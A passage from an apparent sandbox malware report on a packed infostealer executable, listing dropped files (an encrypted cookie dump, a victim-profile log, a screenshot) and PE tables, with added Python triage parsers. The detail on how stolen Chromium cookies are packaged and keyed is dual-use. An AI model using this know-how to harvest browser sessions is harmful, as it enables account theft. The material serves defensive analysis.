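        change counter equals version-valid-for (SQLite file format, section 1.3.7)."""
        return self.pages != 0 and self.change_counter == self.version_valid_for


def parse_sqlite_header(data: bytes) -> SQLiteHeader:
    if len(data) < 100 or data[:16] != SQLITE_MAGIC:
        raise ValueError("not a SQLite 3 database file")
    raw_page = struct.unpack_from(">H", data, 16)[0]
    page_size = 65536 if raw_page == 1 else raw_page      # 1 encodes 65536
    change_counter, pages, _trunk, _free, cookie, schema_fmt = struct.unpack_from(">6I", data, 24)
    enc = struct.unpack_from(">I", data, 56)[0]
    valid_for, version = struct.unpack_from(">2I", data, 92)
    return SQLiteHeader(page_size, change_counter, pages, cookie, schema_fmt,
                        TEXT_ENCODINGS.get(enc, f"encoding {enc}"), valid_for, version)


def size_check(hdr: SQLiteHeader, file_size: int) -> dict:
    """Compare the logical size implied by the header with the bytes on disk."""
    logical = hdr.pages * hdr.page_size
    return {"logical_bytes": logical, "file_bytes": file_size,
            "slack_pages": (file_size - logical) // hdr.page_size,
            "header_count_valid": hdr.header_size_is_valid()}


def build_header(page_size, change_counter, pages, cookie, schema_fmt, valid_for, version, encoding=1) -> bytes:
    """Constructed 100-byte header for offline testing; no real browser database needed."""
    hdr = bytearray(100)
    hdr[0:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18:24] = bytes([1, 1, 0, 64, 32, 32])   # write/read version, reserved, payload fractions
    struct.pack_into(">6I", hdr, 24, change_counter, pages, 0, 0, cookie, schema_fmt)
    struct.pack_into(">I", hdr, 56, encoding)
    struct.pack_into(">2I", hdr, 92, valid_for, version)
    return bytes(hdr)


# Values taken from the report's 196608-byte dropped database.
SAMPLE_HEADER = build_header(2048, 8, 89, 0x36, 4, 8, 3042000)

if __name__ == "__main__":
    h = parse_sqlite_header(SAMPLE_HEADER)
    print(h.describe())
    print(size_check(h, 196608))
```

To triage a real dropped file, read its first 100 bytes and pass them to parse_sqlite_header together with the on-disk size; a non-zero slack_pages with header_count_valid true means the tail of the file is outside the logical database and worth carving separately.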
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):530
                                                                        Entropy (8bit):5.999391385907715
                                                                        Encrypted:false
                                                                        SSDEEP:12:copYxSlufq7gCx7Fbyr4rOSlTfJJADr6HDsZQZ7gC6:KauS79Gr4iSllJALQZ7c
                                                                        MD5:06ED2CD304730F55A5C7001509E128BE
                                                                        SHA1:49651485B2CE3D239172BD52BF5A265AB3EB8E18
                                                                        SHA-256:66851B5AA77B3DEE71B842F53D4E30F664F5A08F9754B9E87B323871981516A4
                                                                        SHA-512:0163A8537DE695D34865EEB9C872F15A1827644D8797344A2D36E776F174E5901E77AA560488B0D7D7359B3648614F818B85A7D51F59CCDF2831B5715F5A9334
                                                                        Malicious:false
                                                                        Preview:.google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*..
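Added example, not from the report and not the malware's code: a parser for the dropped cookie file shown above. The file is in the Netscape cookies.txt layout (domain, include-subdomains flag, path, secure flag, Unix expiry, name, value), tab-separated, with the tabs rendered as dots in the Preview. Each value is wrapped as ENC893*_<base64>_<base64>*; that wrapper layout is inferred from the Preview and is an assumption, not a documented format. The first base64 blob of the 1P_JAR entry decodes to 44 bytes beginning with "v10", the prefix Chromium's os_crypt puts on AES-256-GCM-encrypted values (12-byte nonce, ciphertext, 16-byte tag), which leaves 13 bytes of ciphertext; the second blob is 32 bytes and identical for both cookies in the Preview (the report does not say what it is). The sample input reuses the report's 1P_JAR line and adds one constructed cleartext line to exercise the other branch.

```python
import base64
from dataclasses import dataclass
from typing import Optional

# Constructed sample in cookies.txt layout. Line 1 is the report's 1P_JAR entry with
# tabs as separators; line 2 is an invented cleartext cookie.
SAMPLE_COOKIE_FILE = (
    ".google.com\tFALSE\t/\tTRUE\t1699018815\t1P_JAR\t"
    "ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8="
    "_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*\r\n"
    ".example.com\tTRUE\t/\tFALSE\t1700000000\tsession\tabc123\r\n"
)

WRAPPER_PREFIX = "ENC893*_"                        # assumed wrapper, as seen in the Preview
CHROMIUM_V10 = b"v10"                              # Chromium os_crypt AES-256-GCM prefix
DPAPI_MAGIC = b"\x01\x00\x00\x00\xd0\x8c\x9d\xdf"  # CryptProtectData blob: version 1 + provider GUID


@dataclass
class Cookie:
    domain: str
    include_subdomains: bool
    path: str
    secure: bool
    expires: int
    name: str
    value: str
    scheme: str = "cleartext"
    nonce: Optional[bytes] = None
    ciphertext: Optional[bytes] = None
    tag: Optional[bytes] = None
    trailer: Optional[bytes] = None                # decoded second blob, meaning unknown


def classify_blob(blob: bytes) -> str:
    """Identify how a Chromium cookie value was protected before it was dumped."""
    if blob.startswith(CHROMIUM_V10):
        return "chromium-v10"
    if blob.startswith(DPAPI_MAGIC):
        return "dpapi"
    return "unknown"


def parse_cookie_line(line: str) -> Cookie:
    fields = line.rstrip("\r\n").split("\t")
    if len(fields) != 7:
        raise ValueError(f"expected 7 tab-separated fields, got {len(fields)}")
    domain, subs, path, secure, expires, name, value = fields
    c = Cookie(domain, subs == "TRUE", path, secure == "TRUE", int(expires), name, value)
    if value.startswith(WRAPPER_PREFIX) and value.endswith("*"):
        first, _, second = value[len(WRAPPER_PREFIX):-1].partition("_")
        blob = base64.b64decode(first)
        c.scheme = classify_blob(blob)
        c.trailer = base64.b64decode(second) if second else None
        if c.scheme == "chromium-v10":
            # v10 layout: "v10" || 12-byte nonce || ciphertext || 16-byte GCM tag
            c.nonce, c.ciphertext, c.tag = blob[3:15], blob[15:-16], blob[-16:]
    return c


def parse_cookie_file(text: str) -> list:
    return [parse_cookie_line(l) for l in text.splitlines() if l and not l.startswith("#")]


if __name__ == "__main__":
    for ck in parse_cookie_file(SAMPLE_COOKIE_FILE):
        print(ck.domain, ck.name, ck.scheme,
              None if ck.ciphertext is None else len(ck.ciphertext), "ct bytes")
```

Decrypting a v10 value needs the AES-256 key from the profile's Local State file (itself DPAPI-protected to the victim's user account), which is why a stealer that cannot unwrap it on the host ships the encrypted value instead; the parser therefore only separates nonce, ciphertext and tag and does not attempt decryption.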
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):112
                                                                        Entropy (8bit):4.9113057226932435
                                                                        Encrypted:false
                                                                        SSDEEP:3:N8DSLvIJiMgTE2WdkQVjDSLvIJiMhKVX3L2WdkQVQ:2OLciodFOLciA8dq
                                                                        MD5:0CE7E561D96623E70DD177304D3B56DA
                                                                        SHA1:27B4131817E71657AED90C086E01E7E925BF641E
                                                                        SHA-256:E0B2F92CFB58B7D5EDFBB1FDF3E81194D4E55A90706986C389BDF21D2AD2325D
                                                                        SHA-512:48154E76523305BBB7ED39FEAD22CB4DD6FDD568259DC8D0E70ABA4A21030DAF6D1274E0DC5D7F10DFCF7B3B61BD2401FFB4768F301AEF04F142AF23EF335AB5
                                                                        Malicious:false
                                                                        Preview:https://www.mozilla.org/privacy/firefox/.1696426831..https://www.mozilla.org/en-US/privacy/firefox/.1696426831..
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):6387
                                                                        Entropy (8bit):5.472920704866244
                                                                        Encrypted:false
                                                                        SSDEEP:96:xzxJRCRhuc2KBhA6tsxODsh2VktQLANUbg3x:x8PuX6tsxPh2SB
                                                                        MD5:A61B00278DDFAB358CD0998F6A9F0EE9
                                                                        SHA1:8FEDE9166A11B006E1C8C4CAC8970ED72BFE10C0
                                                                        SHA-256:F8AA247019E483BB7F645BCD209F4E114C7B35A570F4BDCF8D84E9348508849D
                                                                        SHA-512:1679D9048458A4BD8A9170E612220E257A406CC46F881E3906B822688081C17E153571379C4DFDB9FA509D610BFC40F36B58FE03D5A98FCAB8637142683DAEF4
                                                                        Malicious:false
                                                                        Preview:Build: default..Version: 2.0....Date: Sun May 12 12:31:03 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 821ed8f33db41d932a559920361b1350....Path: C:\Users\user\Desktop\file.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixywEuxN9jQl5RT....IP: 81.181.60.11..Location: US, Seattle..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 724536 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 12/5/2024 12:31:3..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe [788].
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4897
                                                                        Entropy (8bit):2.518316437186352
                                                                        Encrypted:false
                                                                        SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                        MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                        SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                        SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                        SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):709223
                                                                        Entropy (8bit):7.9293497756756075
                                                                        Encrypted:false
                                                                        SSDEEP:12288:0QmVT444oC/rSfJG2FflFivwmzJywBzQeTf8L3zmFLlXA7iXyDY:jmVT34oC/CJGcivfvhf8jERQeyDY
                                                                        MD5:8245875C5A6994F35A9DF72E996FDF10
                                                                        SHA1:D633A9E339C4A52BC88274EC2337BC1933DD27B4
                                                                        SHA-256:DAB0E535FC7279C990CE36720D57CED7173F92952D50ED6F60FB11EF875FAE39
                                                                        SHA-512:03D9E9DFC8426CBF75CEF55A81F95DDD4256DD4A70FBF76BC818257BEBFA0FBB65033F6026E0668ED0F31FC6D979CE942B12230B7864C86B8A414254A6684221
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e....Y.....f...../....................#.. ...)$$..F.H.Z.@ ... Jx...@..z.9..uw..2oV......{..9.f!U>..9.....j.^..f.h.m..^.K...u...,S....i.l?w8..N._.....F.L...;q.../..7^..Wl.h.ai.}z...aZ.}-....W..=.Ri-{v .....}......N..g.2vdE..g.......O...aS......I..'.....Y.z|.....P......i}../<..>..$..>...............C.c.}px....h..g.1.......=./...}.....x..',o..?~_...z3..v_..soO..........c....bs..7S.h.X9...w5}....;.v.s....0........Sk..i.G.Ls..1..]o.}xyn...r...?.`.............i.....f...w.........j.k....%...N.6....#.......4...2..<..?7w.[rl.N.......-..;.u..9.-.)...1...!.......4........r.[;.....#......s..m..6......z.%.a.7....5...........-...4.{...>.v..~..w..R{.ks;......f..&...i.c...]....W..^....]..ki.1?.>.<..s..6..+6gK..s.s..f..s.la..m.P.l.2.]mcrl...ovM..#6...]....FW.....~.b..W6.~.>....u}.^.........6...j<g#....4..k}b......lf..|>......W.....ru=....=..X.k....<r
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sun May 12 09:31:52 2024, mtime=Sun May 12 09:31:52 2024, atime=Sun May 12 09:31:52 2024, length=125695, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):1330
                                                                        Entropy (8bit):4.890114825762116
                                                                        Encrypted:false
                                                                        SSDEEP:24:8qQQHfw8Hh6ORDgKALhXAVxzedPzqygm:8qQQHttRkhwVxzeoyg
                                                                        MD5:3B69C4165D947DB01F4575A41A247676
                                                                        SHA1:B2496F776F7832BBE6DE92E52A73F48BE07F6D0F
                                                                        SHA-256:F1A71021122976DA7BDBC23D505964A94E6464E814D405B976D7F7B3870FC16D
                                                                        SHA-512:BB9862710498A6A1CFB03480A6379E75595734ACBC6E038807C12B1EC8C9A8A8080D332600E14A39F2EB218F142FF91E13623065600D351D582670E06E2BCA5E
                                                                        Malicious:false
                                                                        Preview:L..................F.... ....%..W....%..W...6c..W...........................X.:..DG..Yr?.D..U..k0.&...&...... M.....&PprW.....W.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X.S....B.....................Bdg.A.p.p.D.a.t.a...B.P.1......X.S..Local.<......DWSl.X.S....V.....................P\..L.o.c.a.l.....N.1......X.S..Temp..:......DWSl.X.S....\......................O..T.e.m.p.......1......X.S..EDGEMS~1.........X.S.X.S.........."...............&...E.d.g.e.M.S.2._.c.8.1.e.7.2.8.d.9.d.4.c.2.f.6.3.6.f.0.6.7.f.8.9.c.c.1.4.8.6.2.c.....b.2......X.S .EdgeMS2.exe.H......X.S.X.S.............................E.d.g.e.M.S.2...e.x.e.......................-....................d.....C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe....E.d.g.e.M.S.2.Q.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.M.S.2._.c.8.1.e.7.2.8.d.9.d.4.c.2.f.6.3.6.f.0.6.7.f.8.9.c.c.1.4.8.6.2.c.\.E.d.g.e.M.S.2...e.x.e.........
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                        Category:dropped
                                                                        Size (bytes):1835008
                                                                        Entropy (8bit):4.4189728188291895
                                                                        Encrypted:false
                                                                        SSDEEP:6144:8Svfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:nvloTMW+EZMM6DFyn03w
                                                                        MD5:E6980A2EB81490286474E168190798E2
                                                                        SHA1:F7D9CD70F1F50C2E9A88A2FCECEC782251B8EDFC
                                                                        SHA-256:08B700CC9C05E13C8018976D082E6AF7445C0C70A243141BAF7EC79FF0A3DA7B
                                                                        SHA-512:0F57AD53BF722A4FCB81B61EC862A4C0D803BDBB212A64948C1896A3FE7EA0ED2BD2EF96E761A02A5553BD186F1784C31CE45EF6E14748A03A71BC8DF4907693
                                                                        Malicious:false
                                                                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..W...............................................................................................................................................................................................................................................................................................................................................3..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.882034995724492
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:file.exe
                                                                        File size:3'434'744 bytes
                                                                        MD5:a594a9e1f8db460345e86810d1c9a639
                                                                        SHA1:ca9a256f48c6059909926c6fa547c56f9a2df9c0
                                                                        SHA256:d8e3a7e5df4c2591b40d2af7a224c6e5cb18e11d27cbfdbfdda4e02db33c849e
                                                                        SHA512:b03606f6e0ce2a6665a889e06816673754c0a4a2580d6acdec5a892ed5dcc7a03c5174643581e4c9e756b187dc3cd0fde1e437eaa456aa1aa8e9b531ab1ce8d7
                                                                        SSDEEP:98304:cvuyJF4/U6Wcq29czi/dwKXvCu28ENYvViLFn:DcLMqOJvyYvVE1
                                                                        TLSH:26F523937AC112E4F599A0355683FCBD3AB53FF514508D1A708C7AAFE8F3264A13B642
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jR;f...............'.....0........E...........@..........................0b.....;.4...@................................
                                                                        Icon Hash:6fdb9b9b1b1c8838
                                                                        Entrypoint:0x85eba1
                                                                        Entrypoint Section:.vmp\]
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x663B526A [Wed May 8 10:22:34 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:7ad43923e3c89560dc5c9969c825cbc8
                                                                        Signature Valid:false
Signature Issuer:CN=AVG Technologies USA LLC ™‰™‰™‰
                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                        Error Number:-2146762487
                                                                        Not Before, Not After
                                                                        • 06/01/2024 11:14:42 07/01/2034 11:14:42
                                                                        Subject Chain
• CN=AVG Technologies USA LLC ™‰™‰™‰
                                                                        Version:3
                                                                        Thumbprint MD5:27F5DD79C86B9255242DDB29A51B691E
                                                                        Thumbprint SHA-1:44268FBAA5D87BA1717C7237701B06FA20E9AF66
                                                                        Thumbprint SHA-256:1C39A7BBBC7445339DEFD55E21DFA65CDEB9037F0FD33140759077C31CB40BE0
                                                                        Serial:59AE1233E1806897438DF0EEC7051E17
                                                                        Instruction
                                                                        call 00007F81B4F59685h
                                                                        mov ebp, EB3FB93Eh
                                                                        push ebp
                                                                        sar bp, FF87h
                                                                        mov ebp, esi
                                                                        sar word ptr [esp+00h], 0068h
                                                                        ja 00007F81B4F8DB0Ah
                                                                        and al, dl
                                                                        jmp 00007F81B4F08E3Fh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e6f14 | 0x12c | .vmp\]
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5b6000 | 0x6cae6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x345000 | 0x18f8 | .vmp\]
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5b4000 | 0x1a44 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x43e4d4 | 0x18 | .vmp\]
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5b37f0 | 0x40 | .vmp\]
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b6000 | 0x84 | .vmp\]
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x415b7c | 0x40 | .vmp\]
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x15bae8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x15d000 | 0x27e32 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x185000 | 0x4930 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp\] | 0x18a000 | 0x12b095 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp\] | 0x2b6000 | 0x588 | 0x600 | e77729a5ce6ad7ee7568939c4c4c541c | False | 0.06966145833333333 | data | 0.43101004462120796 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp\] | 0x2b7000 | 0x2fcfc0 | 0x2fd000 | 474d5673c52eefd970d1197c64cd03c8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc | 0x5b4000 | 0x1a44 | 0x1c00 | f87576d0c3b87673ec2bfc996d4dca47 | False | 0.3597935267857143 | data | 5.733645560847565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x5b6000 | 0x6cae6 | 0x45a00 | 9e54af52a1f6856bc3054854d7a51e65 | False | 0.5843735973967684 | data | 6.336442400565138 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
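The script below is an added example, not part of the Joe Sandbox report or of the sample's own code. It takes the section, data-directory, entry point and file-size values from the tables above (transcribed verbatim) and re-derives the facts behind the "Entry point lies outside standard sections" and "PE file contains section with special chars" signatures: which section holds the entry point and each directory, which sections carry no bytes in the file (their MD5 is the MD5 of zero bytes), and that the Authenticode blob referenced by IMAGE_DIRECTORY_ENTRY_SECURITY (a file offset, not an RVA) is the last 0x18f8 bytes of the 3'434'744-byte file. The header size it reports (0x400) is derived under the assumption that the raw sections are stored back to back after the headers; the report does not state it.

```python
# Added example (not from the Joe Sandbox report): static-layout checks over
# the section and directory values shown in the report's PE tables.
from dataclasses import dataclass

IMAGE_BASE = 0x400000                 # Imagebase
ENTRY_POINT_VA = 0x85eba1             # Entrypoint (virtual address)
FILE_SIZE = 3_434_744                 # File size
SECURITY_DIR = (0x345000, 0x18f8)     # IMAGE_DIRECTORY_ENTRY_SECURITY: (file offset, size)
EMPTY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"   # MD5 of zero bytes
PAGE = 0x1000                         # section alignment of this image


@dataclass(frozen=True)
class Section:
    name: str
    vaddr: int       # virtual address (RVA)
    vsize: int       # virtual size
    raw_size: int    # bytes actually stored in the file
    md5: str         # MD5 of those raw bytes


# Transcribed from the section table above.
SECTIONS = [
    Section(".text",   0x1000,   0x15bae8, 0x0,      EMPTY_MD5),
    Section(".rdata",  0x15d000, 0x27e32,  0x0,      EMPTY_MD5),
    Section(".data",   0x185000, 0x4930,   0x0,      EMPTY_MD5),
    Section(".vmp\\]", 0x18a000, 0x12b095, 0x0,      EMPTY_MD5),
    Section(".vmp\\]", 0x2b6000, 0x588,    0x600,    "e77729a5ce6ad7ee7568939c4c4c541c"),
    Section(".vmp\\]", 0x2b7000, 0x2fcfc0, 0x2fd000, "474d5673c52eefd970d1197c64cd03c8"),
    Section(".reloc",  0x5b4000, 0x1a44,   0x1c00,   "f87576d0c3b87673ec2bfc996d4dca47"),
    Section(".rsrc",   0x5b6000, 0x6cae6,  0x45a00,  "9e54af52a1f6856bc3054854d7a51e65"),
]


def section_index_for_rva(rva, sections=SECTIONS):
    """Index of the section whose virtual range contains rva, or None (headers/gaps)."""
    for i, s in enumerate(sections):
        if s.vaddr <= rva < s.vaddr + s.vsize:
            return i
    return None


def packer_indicators(sections=SECTIONS, entry_va=ENTRY_POINT_VA, image_base=IMAGE_BASE):
    """Layout facts that together point at a packed or virtualised image."""
    names = [s.name for s in sections]
    ep_index = section_index_for_rva(entry_va - image_base, sections)
    return {
        # compiler-emitted names are printable ASCII such as .text or .rdata
        "unusual_names": [i for i, s in enumerate(sections)
                          if not all(c.isalnum() or c in "._$" for c in s.name)],
        # code/data that exists only in memory is filled in by the unpacker at run time
        "no_raw_data": [i for i, s in enumerate(sections)
                        if s.raw_size == 0 and s.vsize > 0 and s.md5 == EMPTY_MD5],
        # more than a page of virtual space beyond the raw data (zero-filled on load)
        "virtual_overhang": [i for i, s in enumerate(sections)
                             if s.raw_size and s.vsize > s.raw_size + PAGE],
        "entry_section": ep_index,
        "entry_in_text": ep_index is not None and sections[ep_index].name == ".text",
        "duplicate_names": sorted({n for n in names if names.count(n) > 1}),
    }


def file_layout(file_size=FILE_SIZE, sections=SECTIONS, security_dir=SECURITY_DIR):
    """Account for the whole file: headers + raw sections + Authenticode blob.
    Assumes raw sections are contiguous after the headers and that the
    signature blob follows the last section (header size is derived, not read)."""
    sec_off, sec_size = security_dir
    raw_total = sum(s.raw_size for s in sections)
    return {
        "raw_bytes_in_sections": raw_total,
        "header_bytes": sec_off - raw_total,
        "signature_ends_at_eof": sec_off + sec_size == file_size,
    }


if __name__ == "__main__":
    ind = packer_indicators()
    ep = ind["entry_section"]
    print(f"entry RVA {ENTRY_POINT_VA - IMAGE_BASE:#x} -> section {ep} ({SECTIONS[ep].name})")
    for key, value in ind.items():
        print(f"  {key}: {value}")
    for key, value in file_layout().items():
        print(f"  {key}: {value}")
```

The same `section_index_for_rva` check reproduces the "Is in Section" column of the directory table (import, TLS, load-config and delay-import directories all land in the third `.vmp\]` section, the IAT in the second). The `.rsrc` overhang matches the resource table that follows: every resource past the section's raw data is listed as `empty`.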
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x5fb9c0 | 0x22dfa | data | | | 0.1875
RT_ICON | 0x5b6a30 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.7562056737588653
RT_ICON | 0x5b6e98 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.5773921200750469
RT_ICON | 0x5b7f40 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | | | 0.439950401511573
RT_ICON | 0x5bc168 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.33488110729918374
RT_ICON | 0x5cc990 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.7562056737588653
RT_ICON | 0x5ccdf8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.5773921200750469
RT_ICON | 0x5cdea0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | | | 0.439950401511573
RT_ICON | 0x5d20c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.33488110729918374
RT_ICON | 0x5e28f0 | 0xbfad | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9974729462593491
RT_ICON | 0x5ee8a0 | 0xbfad | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9974729462593491
RT_MENU | 0x61e7bc | 0x4a | empty | | | 0
RT_DIALOG | 0x61e808 | 0xea | empty | | | 0
RT_STRING | 0x61e8f4 | 0x50 | empty | | | 0
RT_ACCELERATOR | 0x61e944 | 0x10 | empty | | | 0
RT_GROUP_ICON | 0x5fa850 | 0x4c | data | | | 0.7763157894736842
RT_GROUP_ICON | 0x5fa89c | 0x4c | data | | | 0.8157894736842105
RT_VERSION | 0x5fa8e8 | 0x29c | data | | | 0.48353293413173654
RT_MANIFEST | 0x5fab84 | 0xe3b | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.38594564919022784
None | 0x61e954 | 0xb | empty | | | 0
None | 0x61e960 | 0x103 | empty | | | 0
None | 0x61ea64 | 0x78f | empty | | | 0
None | 0x61f1f4 | 0x4b | empty | | | 0
None | 0x61f240 | 0x238 | empty | | | 0
